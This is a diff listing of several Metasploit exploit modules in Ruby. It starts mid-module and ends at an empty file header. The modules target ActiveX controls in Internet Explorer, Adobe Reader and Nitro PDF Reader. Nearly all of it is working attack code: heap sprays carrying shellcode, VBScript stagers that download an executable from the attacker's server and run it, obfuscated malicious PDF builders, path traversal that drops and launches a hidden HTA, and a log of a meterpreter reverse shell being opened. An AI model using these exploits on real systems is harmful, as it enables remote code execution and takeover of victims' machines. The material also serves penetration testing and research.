'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0267' ],
[ 'OSVDB', '78253' ],
[ 'BID', '51374' ],
[ 'URL', 'http://secunia.com/secunia_research/2012-2/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => ""
},
'Platform' => 'win',
'Targets' =>
[
# NTR ActiveX 1.1.8.0
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4'} ]
],
'Privileged' => false,
'DisclosureDate' => 'Jan 11 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end
def get_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 500; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[3] #IE 7 on Windows Vista SP2
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js = get_spray(my_target, js_code, js_nops)
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
address = 0x0c0c0c0c / 0x134
html = <<-MYHTML
<html>
<body>
<object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
<script>
#{js}
test.StopModule(#{address});
</script>
</body>
</html>
MYHTML
html = html.gsub(/^ {4}/, '')
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
The pointer is "controlled" here:
.text:10004449 mov eax, [ebp+arg_0] ; arg_0 is user controlled
.text:1000444C imul eax, 134h ; it looks good
.text:10004452 lea esi, [eax+edi] ; eax is user controlled
.text:10004452 ; edi is a heap pointer initialized while activex loading
.text:10004452 ; (Important note: the default heap isn't being used)
.text:10004452 ;
.text:10004452 ; edi:
.text:10004452 ;
.text:10004452 ; 0:000> !heap -p -a edi
.text:10004452 ; address 01fb370c found in
.text:10004452 ; _HEAP @ 1fb0000
.text:10004452 ; HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
.text:10004452 ; 01fb3668 0373 0000 [01] 01fb3670 01b90 - (busy)
.text:10004452 ; ? ntractivex118!DllUnregisterServer+10d18
.text:10004452 ;
.text:10004452 ; Initialization (while activex loading):
.text:10004452 ; ChildEBP RetAddr Args to Child
.text:10004452 ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac
.text:10004452 ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823
.text:10004452 ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a
.text:10004452 ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114
And user to get RCE here:
.text:1000446E mov eax, [esi+24h] ; esi can be user influenced
.text:10004471 test eax, eax
.text:10004473 jz short loc_10004477
.text:10004475 call eax ; RCE!
=end

108
modules/exploits/windows/browser/real_arcade_installerdlg.rb
View File

@ -1,108 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution',
'Description' => %q{
This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec"
function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands
on the victim machine.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', #Initial discovery, poc
'sinn3r', #msf
],
'References' =>
[
[ 'OSVDB', '71559' ],
[ 'EDB', '17105' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', {} ],
],
'DisclosureDate' => 'Apr 3 2011',
'DefaultTarget' => 0))
end
# Unfortunately if we echo the vbs cmdstager too many times, we tend to have random missing lines in
# either the payload or the vbs script. To avoid this problem, I ended up writing this custom routine
# that only uses one echo.
def build_vbs(url, payload_name, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
tmp = "#{@temp_folder}/#{stager_name}"
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"\"Microsoft.XMLHTTP\"\") "
vbs << ": #{name_xmlhttp}.open \"\"GET\"\",\"\"http://#{url}\"\",False : #{name_xmlhttp}.send"
vbs << ": Set #{name_adodb} = CreateObject(\"\"ADODB.Stream\"\") "
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
vbs << ": #{name_adodb}.SaveToFile \"\"#{@temp_folder}/#{payload_name}.exe\"\",2 "
vbs << ": CreateObject(\"\"WScript.Shell\"\").Run \"\"#{@temp_folder}/#{payload_name}.exe\"\",0 >> #{tmp}"
return vbs
end
def exploit
@payload_name = rand_text_alpha(4)
@temp_folder = "C:/Windows/Temp"
super
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending payload EXE")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
# Payload's URL
payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
# Create the stager (download + execute payload)
stager_name = rand_text_alpha(6) + ".vbs"
stager = build_vbs(payload_src, @payload_name, stager_name)
html_obj_name = rand_text_alpha(6)
html = <<-EOS
<html>
<object classid='clsid:5818813E-D53D-47A5-ABBB-37E2A07056B5' id='#{html_obj_name}' />
</object>
<script language='vbscript'>
#{html_obj_name}.Exec "cmd","/c #{stager}",1,1,""
setTimeout "x=1", 3000
#{html_obj_name}.Exec "cmd","/c start #{@temp_folder}/#{stager_name}",1,1,""
</script>
</html>
EOS
# Remove extra tabs
html = html.gsub(/^ {4}/, "")
print_status("Sending #{self.name}")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end

163
modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
View File

@ -1,163 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution',
'Description' => %q{
This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The
LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run
arbitrary commands on the victim machine. This module has been successfully tested with the
ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration
Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2011-2657' ],
[ 'OSVDB', '76700'],
[ 'BID', '50274' ],
[ 'ZDI', '11-318' ],
[ 'URL', 'http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1' ],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>
[
# LaunchHelp.dll 9.5.0.0
[ 'Windows Universal', {} ],
],
'DisclosureDate' => 'Oct 19 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WINDOWSTEMP', [ true, "The Windows temporal folder.", "C:/Windows/Temp" ]),
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
])
end
def on_new_session(client)
if client.type != "meterpreter"
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
print_error("The vbs stager and exe payload must be removed manually.")
return
end
# stdapi must be loaded before we can use fs.file
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin
print_warning("Deleting the vbs payload \"#{@stager_name}\" ...")
client.fs.file.rm("#{@temp_folder}/#{@stager_name}")
print_good("The vbs stager has been deleted successfully")
print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
rescue ::Exception => e
print_error("Problems while the clenaup")
print_status("The vbs stager #{@temp_folder}/#{@stager_name} must be removed manually")
print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually")
print_error("Exception: #{e.inspect}")
return
end
end
# Stager wrote by sinn3r to avoid problems when echoing the vbs cmdstager too many times.
# See "real_arcade_installerdlg.rb" for more information.
def build_vbs(url)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
tmp = "#{@temp_folder}/#{@stager_name}"
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
return vbs
end
def exploit
@payload_name = rand_text_alpha(4)
@temp_folder = datastore['WINDOWSTEMP']
@stager_name = rand_text_alpha(6) + ".vbs"
super
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
# Avoid the attack if the victim doesn't have the same setup we're targeting
if not agent =~ /MSIE/
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
if request.uri =~ /\.exe/
print_status("Sending payload EXE")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
# Payload's URL
payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
# Create the stager (download + execute payload)
stager = build_vbs(payload_src)
js = <<-JS
var actvx = new ActiveXObject('LaunchHelp.HelpLauncher.1');
actvx.LaunchProcess("cmd.exe", '/c #{stager}');
actvx.LaunchProcess("cmd.exe", "/c start #{@temp_folder}/#{@stager_name}");
JS
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
html = <<-EOS
<html>
<body>
<script>
#{js}
</script>
</body>
</html>
EOS
# Remove extra tabs
html = html.gsub(/^ {4}/, "")
print_status("Sending #{self.name}")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end

178
modules/exploits/windows/fileformat/adobe_collectemailinfo.rb
View File

@ -1,178 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Collab.collectEmailInfo() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.
By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
'References' =>
[
[ 'CVE', '2007-5659' ],
[ 'OSVDB', '41495' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)', { 'Ret' => '' } ],
],
'DisclosureDate' => 'Feb 8 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape(make_nops(4))
# Randomize variables
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
rand12 = rand_text_alpha(rand(100) + 1)
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} ="";
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
#{rand4} = #{rand2} + #{rand1};
#{rand5} = unescape("#{nops}");
#{rand6} = 20;
#{rand7} = #{rand6}+#{rand4}.length
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
#{rand8} = #{rand5}.substring(0, #{rand7});
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
#{rand10} = new Array();
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
var #{rand12} = unescape("%u0c0c%u0c0c");
while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
this.collabStore = Collab.collectEmailInfo({subj: "",msg: #{rand12}});
|
# Create the pdf
pdf = make_pdf(script)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
# Randomize PDF version?
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end

222
modules/exploits/windows/fileformat/adobe_media_newplayer.rb
View File

@ -1,222 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
'Description' => %q{
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
Professional versions up to and including 9.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # Found in the wild
# Metasploit version by:
'hdm',
'pusscat',
'jduck'
],
'References' =>
[
[ 'CVE', '2009-4324' ],
[ 'BID', '37331' ],
[ 'OSVDB', '60980' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 6.0.1 - vulnerable / doesn't work
# reader 7.0.5 - untested
# reader 7.0.8 - untested
# reader 7.0.9 - vulnerable / doesn't work
# reader 7.1.0 - untested
# reader 7.1.1 - untested
# reader 8.0.0 - untested
# reader 8.1.1 - works
# reader 8.1.2 - untested
# reader 8.1.3 - untested
# reader 8.1.4 - untested
# reader 8.1.5 - untested
# reader 8.1.6 - untested
# reader 9.0.0 - untested
# reader 9.1.0 - works
# reader 9.2 - works (no debugger, no DEP)
[ 'Adobe Reader Windows English (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0c0c0c0c,
}
],
[ 'Adobe Reader Windows German (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0a0a0a0a,
}
],
],
'DisclosureDate' => 'Dec 14 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize variables
#
len = 72
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
vtbuf = [target.ret].pack('V') * 4
vtbuf << rand_text_alpha(len - vtbuf.length)
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
retstring = Rex::Text.to_unescape(vtbuf)
# The printd strings are 72 bytes (??)
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = unescape("#{nops}");
var #{rand3} = unescape("#{retstring}");
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= #{rand2} + #{rand1};
}
util.printd("#{rand4}", new Date());
util.printd("#{rand5}", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(#{rand3}, new Date());
|
# Create the pdf
pdf = make_pdf(script)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end

219
modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
View File

@ -1,219 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
'Description' => %q{
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
PDF Reader version 11. The saveAs() Javascript API function allows for writing
arbitrary files to the file system. Additionally, the launchURL() function allows
an attacker to execute local files on the file system and bypass the security dialog
Note: This is 100% reliable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
'sinn3r' # help with msf foo!
],
'References' =>
[
[ 'CVE', '2017-7442' ],
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'Platform' => 'win',
'Targets' =>
[
# truly universal
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jul 24 2017',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end
def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
vbs = %Q|<head><hta:application
applicationname="#{@payload_name}"
border="none"
borderstyle="normal"
caption="false"
contextmenu="false"
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
maximizebutton="false"
minimizebutton="false"
navigable="false"
scroll="false"
selection="false"
showintaskbar="No"
sysmenu="false"
version="1.0"
windowstate="Minimize"></head>
<style>* { visibility: hidden; }</style>
<script language="VBScript">
window.resizeTo 1,1
window.moveTo -2000,-2000
</script>
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
<script language="VBScript">
On Error Resume Next
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
#{name_xmlhttp}.open "GET","http://#{url}",False
#{name_xmlhttp}.send
Set #{name_adodb} = CreateObject("ADODB.Stream")
#{name_adodb}.Open
#{name_adodb}.Type=1
#{name_adodb}.Write #{name_xmlhttp}.responseBody
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
set shellobj = CreateObject("wscript.shell")
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
</script>|
vbs.gsub!(/ /,'')
return vbs
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending second stage payload")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
end
def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "/Windows/Temp"
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
if datastore['SRVHOST'] == '0.0.0.0'
lhost = Rex::Socket.source_address('50.50.50.50')
else
lhost = datastore['SRVHOST']
end
payload_src = lhost
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
stager_name = rand_text_alpha(6) + ".vbs"
pdf = %Q|%PDF-1.7
4 0 obj
<<
/Length 0
>>
stream
|
pdf << build_vbs(payload_src, stager_name)
pdf << %Q|
endstream endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [ (EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer <<
/Size 6
/Root 1 0 R
>>
startxref
327
%%EOF|
pdf.gsub!(/ /,'')
file_create(pdf)
super
end
end
=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.175.1:4444
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta
msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\researcher\Desktop>
=end

126
modules/exploits/windows/scada/scadapro_cmdexe.rb
View File

